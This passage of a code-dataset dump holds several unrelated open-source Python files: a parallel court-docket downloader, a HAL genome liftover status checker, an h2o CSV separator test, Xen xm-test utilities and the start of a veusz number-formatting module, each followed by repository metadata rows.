def deb(msg, *args, **kwargs):
msg = "getdocket_parallel %s-%s: %s"%(username, client_matter, msg)
logging.info(msg, *args, **kwargs)
# Put all of the tuples into a processing queue
dlqueue = ProcessQueue()
for c_vals in docket_list:
c_vals = list(c_vals)
if len(c_vals) < 2:
raise Exception("Expecting a list of at least two with court, "
"docket, instead got: %s", c_vals)
court, docket = c_vals[:2]
k = get_key(court, docket)
if save_progress != None and save_progress.get(k) and \
save_progress[k]['result']['success']:
# Add to the results
dockets.append(save_progress[k])
else:
# Add it to the download queue
dlqueue.put((court, docket))
# The processes will put their results into the docketqueue
docketqueue = ProcessQueue()
# The main thread removes them from docketqueue and puts them into a list.
# Start up the parallel processes
pool = MultiProcessPool(processes=num_workers, initializer=_dl_worker,
initargs=[username, password, client_matter,
cached, dlqueue, docketqueue])
def iterator(sleep_time = 1.0):
'''An iterator that goes through all of the given dockets.'''
# Continue until the processing queue is empty
got, iters, total = 0, 0, len(docket_list)
while True:
# It takes about 15 seconds to download a docket, so wait that long.
iters += 1
try:
time.sleep(sleep_time)
# get_nowait will have raise Empty and break the loop
while True:
yield docketqueue.get_nowait()
got += 1
except Empty:
left = total - got
if left <= 0:
deb("Finished iterating %s"%total)
break
if iters % 5 == 0:
deb("Did %d/%d, %d left.", got, total, left)
continue
except KeyboardInterrupt as e:
deb("Main thread interrupt: %s" % e)
break
except Exception as e:
deb("Main thread loop exception: %s" % e)
break
dlqueue.close()
docketqueue.close()
pool.close()
pool.terminate()
if _async:
return iterator
for new_i, new_docket in enumerate(iterator()):
dockets.append(new_docket)
# Only save if succesful
if save_progress != None and new_docket['result']['success']:
# Save our progress
k = get_key(new_docket['court'], new_docket['docket'])
save_progress[k] = new_docket
elif save_progress != None and new_i % 20 ==0:
deb("sync dbase len=%d, added=%d ", len(save_progress), 'got')
save_progress.sync()
# Return what we have even if there was an exception.
if save_progress != None:
save_progress.sync()
save_progress.close()
return dockets
################################
def _search_worker(username, password, client_matter, q, inqueue, searchqueue):
# Generic login function
login = lambda: call(call="login", method="POST",
username=username, password=password)['login_token']
token, tries = None, 0
while True:
try:
offset, limit = inqueue.get_nowait()
except Empty:
logging.info("Download Queue Done.")
return
except (KeyboardInterrupt, Exception) as e:
logging.info("Worker exception: %s"%e)
return
# Retry handler
for i in range(0, 2):
# Try logging in every so often
try:
if not token or tries % 25 == 0:
token = login()
result = call(call="search", method="GET", q = q,
offset = offset, limit = limit, o = 'date_filed',
login_token = token, client_matter = client_matter)
except Exception as e:
logging.error("Could not search at %s, tries - %s: %s"%(
offset, tries, e))
tries += 1
continue
tries += 1
if result and not result.get('success'):
logging.warning("Problem getting results: %s"%result)
token = None
continue
break
# Save the results
searchqueue.put({
'offset' : offset,
'limit' : limit,
'result' : result,
})
def search_parallel(username, password, client_matter, q,
num_workers = 15):
'''
Download a list of dockets in parallel by launching many processes.
docket_list: A list of (court, docket) tuples
num_workers: How many parallel processes to start
'''
login_token = call(call="login", method="POST",
username=username, password=password)['login_token']
first_page = call(call="search", method="GET", q=q,
login_token=login_token, client_matter=client_matter)
if 'search_results' not in first_page:
raise Exception("Could not find search results: %s"%first_page)
num_first_page = len(first_page['search_results'])
num_results = first_page['count']
# The main thread removes them from searchqueue and puts them into a list.
results = [None]*num_results
results[:num_first_page] = first_page['search_results']
logging.info("Downloading %s Results, already got first %d"%(
num_results, num_first_page))
# Put all of the search ranges into the result queue
dlqueue = ProcessQueue()
for i in range(num_first_page, num_results, SEARCH_RESULTS_AT_ONCE):
limit = min(num_results, i+SEARCH_RESULTS_AT_ONCE) - i
logging.info("Added: %s --> %s"%(i, i+limit))
dlqueue.put((i, limit))
# The processes will put their results into the searchqueue
searchqueue = ProcessQueue()
# Start up the parallel processes
pool = MultiProcessPool(processes=num_workers, initializer=_search_worker,
initargs=[username, password, client_matter, q,
dlqueue, searchqueue])
try:
# Continue until the processing queue is empty.
while True:
# It takes about 15 seconds to download a docket, so wait that long.
time.sleep(2.0 / num_workers)
got = 0
try:
item = searchqueue.get_nowait()
start, end = item['offset'], item['offset']+item['limit']
results[start:end] = item['result']['search_results']
logging.info("Downloaded: %s --> %s (of %d total)"%(
start, end, num_results))
got += 1
except Empty:
left = len(results) - len([_f for _f in results if _f])
if left <= 0:
break
logging.info("Got %d, %d results. Waiting for %d more."%(
got, len(results), left))
continue
except Exception as e:
logging.info("Main thread loop exception: %s"%e)
break
except KeyboardInterrupt as e:
logging.info("Main thread exception: %s"%e)
dlqueue.close()
searchqueue.close()
pool.close()
pool.terminate()
# Return what we have even if there was an exception.
return results
for i, r in enumerate(results):
if not r:
print("Missing Result %s"%(i+1))
return {
'search_results' : results,
'count' : num_results,
}
| apache-2.0 | -458,155,346,470,452,860 | 29.733333 | 86 | 0.651481 | false |
glennhickey/hal | liftover/halLiftoverStatus.py | 1 | 20969 | #!/usr/bin/env python3
#Copyright (C) 2013 by Ngan Nguyen ([email protected])
# Copyright (C) 2012-2019 by UCSC Computational Genomics Lab
#
#Released under the MIT license, see LICENSE.txtimport unittest
'''
Check liftover status
Input: bed_file (1 entry per element, e.g 1 line per gene)
hal_file
query_name
target_name
out_file
Output: print to out_file tab separated fields checking how each line
of bed_file map to the target, including fields:
<length>: number of bases of the original region in the bed_file
e.g for gene, it's the # non-intronic bases
<mapped>: proportion of length that mapped to the target genome
<rearrangment>: yes/no
<in_frame>: yes/no
<insertions>: list out the insertions
<deletions>: list out the deletions
'''
import os
import sys
from optparse import OptionParser
from sets import Set
from sonLib.bioio import system
from jobTree.scriptTree.target import Target
from jobTree.scriptTree.stack import Stack
class Status():
def __init__(self, name):
self.name = name
self.length = -1
self.map = 0
self.ins = []
self.dels = []
self.oo = False
self.inframe = True
class Psl():
'''Psl record
'''
def __init__(self, line):
items = line.strip().split('\t')
if len(items) != 21:
raise ValueError("Psl format requires 21 fields, line \n%s\n only has %d fields.\n" %(line, len(items)))
self.desc = line
self.matches = int(items[0])
self.misMatches = int(items[1])
self.repMatches = int(items[2])
self.nCount = int(items[3])
self.qNumInsert = int(items[4])
self.qBaseInsert = int(items[5]) # number of bases inserted in query
self.tNumInsert = int(items[6]) # number of inserts in target
self.tBaseInsert = int(items[7]) #number of bases inserted in target
self.strand = items[8] # query strand
self.qName = items[9]
self.qSize = int(items[10])
self.qStart = int(items[11]) #base 0
self.qEnd = int(items[12])
self.tName = items[13]
self.tSize = int(items[14])
self.tStart = int(items[15])
self.tEnd = int(items[16])
self.blockCount = int(items[17])
self.blockSizes = [int(s) for s in items[18].rstrip(',').split(',')]
self.qStarts = [int(s) for s in items[19].rstrip(',').split(',')]
self.tStarts = [int(s) for s in items[20].rstrip(',').split(',')]
if len(self.blockSizes) != self.blockCount or len(self.qStarts) != self.blockCount or len(self.tStarts) != self.blockCount:
raise ValueError("Psl format requires that the number of items in blockSizes, qStarts, tStarts is equal to blockCount. Line: %s\n" %line)
def __cmp__(self, other): # compare by query coordinate
if self.qName != other.qName:
return cmp(self.qName, other.qName)
elif self.qStart != other.qStart:
return cmp(self.qStart, other.qStart)
else:
return cmp(self.qEnd, other.qEnd)
class Bed():
'''Bed record
'''
def __init__(self, line):
items = line.strip().split('\t')
if len(items) < 3:
raise BedFormatError(("Bed format for this program requires a " +
"minimum of 3 fields, line \n%s\n only has %d fields.\n" %
(line, len(items))))
#self.chr = items[0]
self.chr = items[0].split('.')[-1]
try:
self.start = int(items[1]) # base 0
self.end = int(items[2]) # exclusive
except ValueError:
print("BED %s has wrong format\n" % line)
self.name = ''
if len(items) > 3:
self.name = items[3]
if len(items) >= 12:
self.score = items[4]
self.strand = items[5]
assert self.strand == '-' or self.strand == '+'
self.thickStart = int(items[6]) # base 0
self.thickEnd = int(items[7])
self.itemRgb = items[8]
self.blockCount = int(items[9])
self.blockSizes = [int(i) for i in items[10].rstrip(',').split(',')]
self.blockStarts = [int(i) for i in items[11].rstrip(',').split(',')]
assert len(self.blockSizes) == self.blockCount
assert len(self.blockStarts) == self.blockCount
#if blockStarts[0] != 0, convert start & end so that blockStarts[0] = 0
if (len(self.blockStarts) > 0 and
(self.blockStarts[0] != 0 or
self.end != self.start + self.blockStarts[-1] + self.blockSizes[-1])):
offset = self.blockStarts[0]
self.start += offset
self.blockStarts = [s - offset for s in self.blockStarts]
self.end = self.start + self.blockStarts[-1] + self.blockSizes[-1]
else:
self.score = '.'
self.strand = '.'
self.thickStart = self.start
self.thickEnd = self.end
self.itemRgb = '.'
if len(items) >= 10:
self.blockCount = int(items[9])
else:
self.blockCount = 1
self.blockSizes = [self.end - self.start]
self.blockStarts = [0]
def __cmp__(self, other):
if self.chr != other.chr:
return cmp(self.chr, other.chr)
elif self.start != other.start:
return cmp(self.start, other.start)
else:
return cmp(self.end, other.end)
def getStr(self):
blockSizes = ','.join([str(s) for s in self.blockSizes])
blockStarts = ','.join([str(s) for s in self.blockStarts])
return "%s\t%d\t%d\t%s\t%s\t%s\t%d\t%d\t%s\t%d\t%s\t%s" \
%(self.chr, self.start, self.end, self.name, self.score,\
self.strand, self.thickStart, self.thickEnd, self.itemRgb,\
self.blockCount, blockSizes, blockStarts)
def get_bed(file):
f = open(file, 'r')
lines = f.readlines()
assert len(lines) == 1
bed = Bed(lines[0])
f.close()
return bed
def psl_pos_target(psl):
# make sure the target is on the positive strand
if len(psl.strand) != 2 or psl.strand[1] != '-':
return psl
rvstrand = {'-': '+', '+': '-'}
psl.strand = rvstrand[psl.strand[0]] + rvstrand[psl.strand[1]]
sizes = []
qstarts = []
tstarts = []
for i in range(psl.blockCount - 1, -1, -1):
size = psl.blockSizes[i]
qs = psl.qSize - (psl.qStarts[i] + size)
ts = psl.tSize - (psl.tStarts[i] + size)
sizes.append(size)
qstarts.append(qs)
tstarts.append(ts)
psl.blockSizes = sizes
psl.qStarts = qstarts
psl.tStarts = tstarts
return psl
def get_psls(file):
psls = []
f = open(file, 'r')
for line in f:
psl = Psl(line)
psl = psl_pos_target(psl)
psls.append(psl)
f.close()
return psls
def psl_getPosCoords(psl):
# This function reverse the psl if query strand is -, to make sure that query strand is always +
# make sure that the target strand of INPUT psl is always on the + strand
assert len(psl.strand) < 2 or psl.strand[1] != '-'
strand = psl.strand
if psl.strand[0] == '-':
qstarts = []
tstarts = []
sizes = []
for i in range(psl.blockCount - 1, -1, -1):
qstart = psl.qSize - (psl.qStarts[i] + psl.blockSizes[i])
tstart = psl.tSize - (psl.tStarts[i] + psl.blockSizes[i])
qstarts.append(qstart)
tstarts.append(tstart)
sizes.append(psl.blockSizes[i])
qstrand = '+'
if len(psl.strand) == 2 and psl.strand[1] == '-':
tstrand = '+'
else:
tstrand = '-'
strand = qstrand + tstrand
else:
qstarts = psl.qStarts
tstarts = psl.tStarts
sizes = psl.blockSizes
return qstarts, tstarts, sizes, strand
def psl_check_query_overlap(psl1, psl2):
# return True if query ranges of psl1 is overlap with query ranges of psl2
overlap = 0
if (psl1.qName != psl2.qName or psl1.qEnd <= psl2.qStart or
psl2.qEnd <= psl1.qStart): # not overlap
return overlap
# Convert query coordinates of both psls to query + strand
starts1, tstarts1, sizes1, strand1 = psl_getPosCoords(psl1)
starts2, tstarts2, sizes2, strand2 = psl_getPosCoords(psl2)
# Check each block:
for i1, start1 in enumerate(starts1):
end1 = start1 + sizes1[i1]
for i2, start2 in enumerate(starts2):
end2 = start2 + sizes2[i2]
if start2 < end1 and start1 < end2: # overlap
ostart = max(start1, start2)
oend = min(end1, end2)
overlap += (oend - ostart)
return overlap
def get_next_non_overlap_psl(sets, sorted_psls):
new_sets = [] # list of lists, each elment = ([], lastindex)
# each set is represented as list of indices of the psls in that list
for curr_set in sets:
psl_indices = curr_set[0]
i = curr_set[1] # current index
added = 0
for j in range(i + 1, len(sorted_psls)):
psl = sorted_psls[j]
overlap = False
for index in psl_indices:
psl0 = sorted_psls[index]
if psl_check_query_overlap(psl, psl0) > 0:
overlap = True
break
if not overlap: # current psl does not overlap with any element
added += 1
new_set = (psl_indices + [j], j)
curr_new_sets = get_next_non_overlap_psl([new_set], sorted_psls)
new_sets = new_sets + curr_new_sets
if added == 0: # no additional non-overlap psl found
new_set = (psl_indices, len(sorted_psls))
new_sets.append(new_set)
return new_sets
def get_non_overlap_psls_sets(psls):
# some bases in the query bed map to multiple positions on the target
# this function return all possible sets of psls where the query base
# only appear at most once
sets = []
for i in range(len(psls)): # each psl as a starting element
start_set = ([i], i)
curr_sets = get_next_non_overlap_psl([start_set], psls)
for s in curr_sets: # make sure added set is not a subset of existing ones
curr_set = Set(s[0])
issubset = False
for s0 in sets:
set0 = Set(s0)
if curr_set.issubset(set0):
issubset = True
break
if not issubset:
sets.append(s[0])
return sets
def psls_get_qcov(psls):
return sum([sum(psl.blockSizes) for psl in psls])
def get_most_qcov(pslsets, sorted_psls):
# return the psl set with highest query coverage
if not pslsets:
return None
most_qcov_set = None
qcov = 0
for pslset in pslsets:
currcov = psls_get_qcov([sorted_psls[i] for i in pslset])
if currcov > qcov:
qcov = currcov
most_qcov_set = pslset
return most_qcov_set, qcov
class Reg:
def __init__(self, name, start, end, strand, size, qstart, qend):
self.name = name
self.start = start
self.end = end
self.strand = strand
self.size = size
self.qstart = qstart
self.qend = qend
def psl_get_tpos(qstarts, tstarts, sizes, qpos):
for i, qs in enumerate(qstarts):
size = sizes[i]
qe = qs + size
if qs <= qpos and qpos <= qe:
offset = qpos - qs
ts = tstarts[i]
return ts + offset
return -1
def block_status(indices, sorted_psls, start, end, edge):
ins = []
dels = []
oo = False
tregs = []
tstart = -1
tend = -1
tname = ''
pos = start
blocksize = end - start
assert blocksize > 0
for index in indices:
psl = sorted_psls[index]
qstarts, tstarts, sizes, strand = psl_getPosCoords(psl)
for i, qstart in enumerate(qstarts):
qend = qstart + sizes[i]
if qend < pos:
continue
elif end < qstart:
break
else:
oqstart = max(pos, qstart)
oqend = min(end, qend)
otstart = psl_get_tpos(qstarts, tstarts, sizes, oqstart)
otend = psl_get_tpos(qstarts, tstarts, sizes, oqend)
if strand[1] == '-':
temp = otstart
otstart = psl.tSize - otend
otend = psl.tSize - temp
assert otend >= otstart
#if otend < otstart:
# temp = otstart
# otstart = otend
# otend = otstart
treg = Reg(psl.tName, otstart, otend, strand[1], psl.tSize, oqstart, oqend)
tregs.append(treg)
if float(oqstart - start)/blocksize > edge:
deletion = oqstart - pos
if deletion > 0:
dels.append(deletion)
pos = oqend
if float(end - pos)/blocksize > edge:
if pos < end:
dels.append(end - pos)
# checking for insertions:
if len(tregs) > 1:
for i in range(1, len(tregs)):
if float(treg.qstart - start)/blocksize <= edge or float(end - treg.qend)/blocksize <= edge:
continue
prev_treg = tregs[i - 1]
treg = tregs[i]
if treg.name == prev_treg.name:
if treg.strand == prev_treg.strand:
if treg.strand == '+':
if prev_treg.end < treg.start:
insertion = treg.start - prev_treg.end
ins.append(insertion)
elif prev_treg.end > treg.start:
oo = True
else:
if treg.end < prev_treg.start:
insertion = prev_treg.start - treg.end
ins.append(insertion)
elif treg.end > prev_treg.start:
oo = True
else:
oo = True
else: # map to different chromosome
oo = True
strands = [treg.strand for treg in tregs]
if len(tregs) > 0:
tstart = min([treg.start for treg in tregs])
tend = max([treg.end for treg in tregs])
tname = tregs[0].name
return ins, dels, oo, strands, tstart, tend, tname
def flipbed(bed):
bed.blockSizes.reverse()
bed.blockStarts.reverse()
return bed
def get_liftover_status(bedfile, liftfile, edge):
# return a status object
bed = get_bed(bedfile)
psls = get_psls(liftfile)
status = Status(bed.name)
# get length:
l = sum(bed.blockSizes)
status.length = l
# get all possible mapping scenario (all sets of psls where each query base is unique)
sorted_psls = sorted(psls)
pslsets = get_non_overlap_psls_sets(sorted_psls)
if not pslsets:
return status
most_qcov_set, map = get_most_qcov(pslsets, sorted_psls)
# map, insertions, deletions, oo, inframe
status.map = map
ins = []
dels = []
currstrand = ''
currtstart = -1
currtend = -1
currtname = ''
for i, start in enumerate(bed.blockStarts): # each block
qstart = bed.start + start
qend = qstart + bed.blockSizes[i]
block_ins, block_dels, block_oo, strands, tstart, tend, tname = block_status(most_qcov_set, sorted_psls, qstart, qend, edge)
ins.extend(block_ins)
dels.extend(block_dels)
if block_oo:
status.oo = True
elif strands: # check with previous block
tstrand = strands[0]
if currstrand: # not first block
if currstrand != tstrand and not status.oo: # change orientation
status.oo = True
elif currtname and tname and tname != currtname and not status.oo:
status.oo = True
else: #check for change in blocks' order
if ((tstrand == '+' and currtend > tstart) or
(tstrand == '-' and currtstart < tend)):
status.oo = True
currstrand = tstrand
if tstart > -1 and tend > -1:
currtstart = tstart
currtend = tend
currtname = tname
status.ins = ins
status.dels = dels
if status.oo or abs(sum(ins) - sum(dels)) % 3 > 0:
status.inframe = False
return status
def print_status(status, outfile):
ins = ",".join([str(i) for i in status.ins])
dels = ",".join([str(i) for i in status.dels])
f = open(outfile, 'w')
if status.map > 0:
f.write("%s\t%d\t%d\t%s\t%s\t%s\t%s\n" % (status.name, status.length,
status.map, ins, dels, str(status.oo), str(status.inframe)))
else:
f.write("%s\t%d\t%d\t%s\t%s\tNA\tNA\n" % (status.name, status.length,
status.map, ins, dels))
f.close()
def splitfile(file, outdir):
f = open(file, 'r')
i = 0
for line in f:
i += 1
outfile = os.path.join(outdir, "%d.bed" % i)
ofh = open(outfile, 'w')
ofh.write(line)
ofh.close()
f.close()
class Setup(Target):
def __init__(self, options):
Target.__init__(self)
self.opts = options
def run(self):
#Split bed file into separate entries
global_dir = self.getGlobalTempDir()
beddir = os.path.join(global_dir, "single_beds")
system("mkdir -p %s" % beddir)
splitfile(self.opts.bedfile, beddir)
#For each bed, lift-over to the target genome, and report status
liftoverdir = os.path.join(global_dir, "liftover")
system("mkdir -p %s" % liftoverdir)
outdir = os.path.join(global_dir, "out")
system("mkdir -p %s" % outdir)
for bedfile in os.listdir(beddir):
bedpath = os.path.join(beddir, bedfile)
liftoverfile = os.path.join(liftoverdir, bedfile)
outfile = os.path.join(outdir, os.path.splitext(bedfile)[0])
self.addChildTarget(LiftoverAndStatus(bedpath, liftoverfile,
outfile, self.opts))
self.setFollowOnTarget(PrintResults(outdir, self.opts.outfile))
class PrintResults(Target):
def __init__(self, indir, outfile):
Target.__init__(self)
self.indir = indir
self.outfile = outfile
def run(self):
f = open(self.outfile, 'w')
f.write("#Name\tLength\tMap\tIns\tDels\tOO\tInframe\n")
f.close()
system("cat %s/* >> %s" % (self.indir, self.outfile))
class LiftoverAndStatus(Target):
def __init__(self, bedfile, liftoverfile, statusfile, opts):
Target.__init__(self)
self.bedfile = bedfile
self.liftfile = liftoverfile
self.statusfile = statusfile
self.opts = opts
def run(self):
cmd = "halLiftover --outPSL --tab %s %s %s %s %s" % (self.opts.halfile,
self.opts.query, self.bedfile, self.opts.target, self.liftfile)
system(cmd)
#system("cp %s %s_liftoverpsl" % (self.liftfile, self.opts.outfile))
status = get_liftover_status(self.bedfile, self.liftfile, self.opts.edge)
print_status(status, self.statusfile)
def addOptions(parser):
parser.add_option('--edge', dest='edge', default=0.0,
help='proportion of block at each edge that is allowed to have errors')
def checkOptions(parser, args, options):
if len(args) < 5:
parser.error("Need 5 input arguments, only %d was given." % len(args))
options.bedfile = args[0]
if not os.path.exists(options.bedfile):
parser.error("Input bed file %s does not exist." % options.bedfile)
options.halfile = args[1]
if not os.path.exists(options.halfile):
parser.error("Input hal file %s does not exist." % options.halfile)
options.query = args[2]
options.target = args[3]
options.outfile = args[4]
def main():
usage = "%prog <bed_file> <hal_file> <query_name> <target_name> <out_file>"
parser = OptionParser(usage=usage)
addOptions(parser)
Stack.addJobTreeOptions(parser)
options, args = parser.parse_args()
checkOptions(parser, args, options)
i = Stack(Setup(options)).startJobTree(options)
if i:
raise RuntimeError("The jobtree contains %d failed jobs.\n" % i)
if __name__ == '__main__':
from halLiftoverStatus import *
main()
| mit | -4,100,937,656,637,816,300 | 35.091222 | 149 | 0.549049 | false |
spennihana/h2o-3 | h2o-py/tests/testdir_parser/pyunit_separator.py | 6 | 4116 | from builtins import str
import sys
sys.path.insert(1,"../../")
import h2o
from tests import pyunit_utils
def separator_test():
"""Test parsing of csv files having different separator characters."""
# Test tab separated files by giving separator argument
path_tab = "smalldata/parser/tabs.tsv"
tab_test = h2o.import_file(path=pyunit_utils.locate(path_tab), destination_frame="tab_hex", sep="\t")
assert tab_test.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(tab_test.nrow))
assert tab_test.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(tab_test.ncol))
# Test tab separated files by giving NO separator argument
tab_test_noarg = h2o.import_file(path=pyunit_utils.locate(path_tab), destination_frame="tab_hex")
assert tab_test_noarg.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(tab_test_noarg.nrow))
assert tab_test_noarg.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(tab_test_noarg.ncol))
# Test pipe separated files by giving separator
path_pipe = "smalldata/parser/pipes.psv"
pipe_test = h2o.import_file(path=pyunit_utils.locate(path_pipe), destination_frame="pipe_hex", sep="|")
assert pipe_test.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(pipe_test.nrow))
assert pipe_test.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(pipe_test.ncol))
# Test pipe separated files by giving NO separator argument
pipe_test_noarg = h2o.import_file(path=pyunit_utils.locate(path_pipe), destination_frame="pipe_hex")
assert pipe_test_noarg.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(pipe_test_noarg.nrow))
assert pipe_test_noarg.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(pipe_test_noarg.ncol))
# Test hive files by giving separator
path_hive = "smalldata/parser/test.hive"
hive_test = h2o.import_file(path=pyunit_utils.locate(path_hive), destination_frame="hive_hex", sep="\001")
assert hive_test.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(hive_test.nrow))
assert hive_test.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(hive_test.ncol))
# Test hive separated files by giving NO separator argument
hive_test_noarg = h2o.import_file(path=pyunit_utils.locate(path_hive), destination_frame="hive_hex")
assert hive_test_noarg.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(hive_test_noarg.nrow))
assert hive_test_noarg.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(hive_test_noarg.ncol))
# Test semi colon separated files by giving separator
path_semi = "smalldata/parser/semi.scsv"
semi_test = h2o.import_file(path=pyunit_utils.locate(path_semi), destination_frame="semi_hex", sep=";")
assert semi_test.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(semi_test.nrow))
assert semi_test.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(semi_test.ncol))
# Test semi colon separated files by giving NO separator argument
semi_test_noarg = h2o.import_file(path=pyunit_utils.locate(path_semi), destination_frame="semi_hex")
assert semi_test_noarg.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(semi_test_noarg.nrow))
assert semi_test_noarg.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(semi_test_noarg.ncol))
# Test caret separated files
path_caret = "smalldata/parser/caret.csv"
caret_test = h2o.import_file(path=pyunit_utils.locate(path_caret), destination_frame="caret_hex", sep=u"^")
assert caret_test.nrow == 3 and caret_test.ncol == 3
# Test asterisk separated files
path_asterisk = "smalldata/parser/asterisk.asv"
asterisk_test = h2o.import_file(path=pyunit_utils.locate(path_asterisk), destination_frame="asterisk_hex", sep=u"*")
assert asterisk_test.nrow == 3 and asterisk_test.ncol == 3
if __name__ == "__main__":
pyunit_utils.standalone_test(separator_test)
else:
separator_test()
| apache-2.0 | 7,092,311,872,023,976,000 | 59.529412 | 120 | 0.706997 | false |
abligh/xen4.2-minideb | tools/xm-test/lib/XmTestLib/Xm.py | 42 | 6036 | #!/usr/bin/python
"""
Copyright (C) International Business Machines Corp., 2005
Author: Dan Smith <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; under version 2 of the License.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
##
## These are miscellaneous utility functions that query xm
##
import commands
import re
import os
import time
from Test import *;
class XmError(Exception):
def __init__(self, msg, trace="", status=0):
self.msg = msg
self.trace = trace
try:
self.status = int(status)
except Exception, e:
self.status = -1
def __str__(self):
return trace
def domid(name):
status, output = traceCommand("xm domid " + name);
if status != 0 or "Traceback" in output:
return -1
if output == "None":
return -1
try:
return int(output)
except:
raise XmError("xm domid failed", trace=output, status=status)
def domname(id):
status, output = traceCommand("xm domname " + str(id));
return output;
def isDomainRunning(domain):
id = domid(domain);
if id == -1:
return False;
else:
return True;
def getRunningDomains():
status, output = traceCommand("xm list");
if status != 0 or "Traceback" in output:
raise XmError("xm failed", trace=output, status=status)
lines = output.splitlines();
domains = [];
for l in lines[1:]:
elms = l.split(" ", 1);
domains.append(elms[0]);
return domains;
def destroyDomU(name):
status, output = traceCommand("xm destroy " + name, logOutput=False);
return status;
def destroyAllDomUs():
if verbose:
print "*** Cleaning all running domU's"
attempt = 0
trying = True
while trying:
try:
attempt += 1
domainList = getRunningDomains()
trying = False
except XmError, e:
if attempt >= 10:
FAIL("XM-TEST: xm list not responding")
time.sleep(1)
print e.trace
print "!!! Trying again to get a clean domain list..."
for d in domainList:
if not d == "Domain-0":
destroyDomU(d);
if verbose:
print "*** Finished cleaning domUs"
def getDomMem(domain):
status, output = traceCommand("xm list")
if status != 0:
if verbose:
print "xm list failed with %i" % status
return None
lines = re.split("\n", output)
for line in lines:
fields = re.sub(" +", " ", line).split()
if domain.isdigit():
if fields[1] == domain:
return int(fields[2])
else:
if fields[0] == domain:
return int(fields[2])
if verbose:
print "Did not find domain " + str(domain)
return None
def getDomInfo(domain, key, opts=None):
if opts:
cmd = "xm list %s" % opts
else:
cmd = "xm list"
status, output = traceCommand(cmd)
if status != 0:
if verbose:
print "xm list failed with %i" % status
return None
lines = output.split("\n")
# Get the key values from the first line headers
cleanHeader = re.sub("\([^\)]+\)", "", lines[0])
colHeaders = re.split(" +", cleanHeader)
doms = {}
for line in lines[1:]:
domValues = {}
values = re.split(" +", line)
i = 1
for value in values[1:]:
domValues[colHeaders[i]] = value
i += 1
doms[values[0]] = domValues
if doms.has_key(domain) and doms[domain].has_key(key):
return doms[domain].get(key)
return ""
def getVcpuInfo(domain):
status, output = traceCommand("xm vcpu-list %s" % domain)
lines = output.split("\n")
vcpus = {}
for line in lines[1:]:
cols = re.split(" +", line)
if cols[3] == '-':
vcpus[int(cols[2])] = None
else:
vcpus[int(cols[2])] = int(cols[3])
return vcpus
def getInfo(key):
info = {}
status, output = traceCommand("xm info")
lines = output.split("\n")
for line in lines:
match = re.match("^([A-z_]+)[^:]*: (.*)$", line)
if match:
info[match.group(1)] = match.group(2)
if info.has_key(key):
return info[key]
else:
return ""
def restartXend():
if verbose:
print "*** Restarting xend ..."
if os.access("/etc/init.d/xend", os.X_OK):
status, output = traceCommand("/etc/init.d/xend stop")
time.sleep(1)
status, output = traceCommand("/etc/init.d/xend start")
return status
else:
status, output = traceCommand("xend stop")
time.sleep(1)
status, output = traceCommand("xend start")
return status
def smpConcurrencyLevel():
nr_cpus = int(getInfo("nr_cpus"))
return nr_cpus
if __name__ == "__main__":
if isDomainRunning("0"):
print "Domain-0 is running; I must be working!"
else:
print "Domain-0 is not running; I may be broken!"
mem = getDomMem("Domain-0")
if not mem:
print "Failed to get memory for Domain-0!"
else:
print "Domain-0 mem: %i" % mem
cpu = getDomInfo("Domain-0", "CPU")
state = getDomInfo("Domain-0", "State")
print "Domain-0 CPU: " + cpu
print "Domain-0 state: " + state
v = getVcpuInfo("Domain-0")
for key in v.keys():
print "VCPU%i is on CPU %i" % (key, v[key])
| gpl-2.0 | 7,654,133,770,707,412,000 | 23.636735 | 74 | 0.571902 | false |
KDB2/veusz | veusz/utils/formatting.py | 3 | 7908 | # Copyright (C) 2010 Jeremy S. Sanders
# Email: Jeremy Sanders <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
from __future__ import division
import re
import math
import numpy as N
from . import dates
_formaterror = 'FormatError'
# a format statement in a string
_format_re = re.compile(r'%([-#0-9 +.hlL]*?)([diouxXeEfFgGcrs%])')
def localeFormat(totfmt, args, locale=None):
"""Format using fmt statement fmt, qt QLocale object locale and
arguments to formatting args.
* arguments are not supported in this formatting, nor is using
a dict to supply values for statement
"""
# substitute all format statements with string format statements
newfmt = _format_re.sub("%s", totfmt)
# do formatting separately for all statements
strings = []
i = 0
for f in _format_re.finditer(totfmt):
code = f.group(2)
if code == '%':
s = '%'
else:
try:
s = f.group() % args[i]
i += 1
except IndexError:
raise TypeError("Not enough arguments for format string")
if locale is not None and code in 'eEfFgG':
s = s.replace('.', locale.decimalPoint())
strings.append(s)
if i != len(args):
raise TypeError("Not all arguments converted during string formatting")
return newfmt % tuple(strings)
def sciToHuman(val, cleanup=False):
"""Convert output from C formatting to human scientific notation.
if cleanup, remove zeros after decimal points
"""
# split around the exponent
leader, exponent = val.split('e')
# strip off trailing decimal point and zeros if no format args
if cleanup and leader.find('.') >= 0:
leader = leader.rstrip('0').rstrip('.')
# trim off leading 1
